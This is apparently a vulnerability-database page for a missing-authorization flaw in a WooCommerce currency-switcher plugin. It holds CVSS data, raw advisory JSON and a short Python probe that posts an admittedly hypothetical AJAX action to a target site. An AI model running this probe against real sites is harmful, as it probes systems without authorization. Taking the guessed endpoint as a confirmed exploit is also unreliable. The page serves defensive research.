Security Vulnerability Report
中文
CVE-2026-39501 CVSS 5.3 MEDIUM

CVE-2026-39501

Published: 2026-04-08 09:16:24
Last Modified: 2026-04-24 18:08:35

Description

Missing Authorization vulnerability in RealMag777 FOX woocommerce-currency-switcher allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FOX: from n/a through <= 1.4.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FOX WooCommerce Currency Switcher <= 1.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-39501 PoC Example # Target: FOX WooCommerce Currency Switcher <= 1.4.5 # Description: Unauthenticated access to sensitive configuration data due to missing authorization. def check_vulnerability(target_url): """ Checks if the target is vulnerable to CVE-2026-39501. Note: The actual endpoint might vary based on plugin configuration. """ # Example vulnerable endpoint (hypothetical based on structure) # Attackers would typically fuzz for unauthenticated AJAX actions endpoint = "/wp-admin/admin-ajax.php" # Common payload for WordPress AJAX actions payload = { "action": "fox_currency_switcher_get_data", # Parameters might differ based on actual vulnerable function } try: response = requests.post(target_url + endpoint, data=payload, timeout=10) # Check if response contains sensitive data or specific success indicators if response.status_code == 200 and "currency" in response.text.lower(): print("[+] Potential vulnerability detected!") print(f"[+] Response: {response.text[:100]}") else: print("[-] Vulnerability not detected or endpoint patched.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://example-site.com" # Replace with actual target check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39501", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:24.373", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in RealMag777 FOX woocommerce-currency-switcher allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FOX: from n/a through <= 1.4.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-currency-switcher/vulnerability/wordpress-fox-plugin-1-4-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}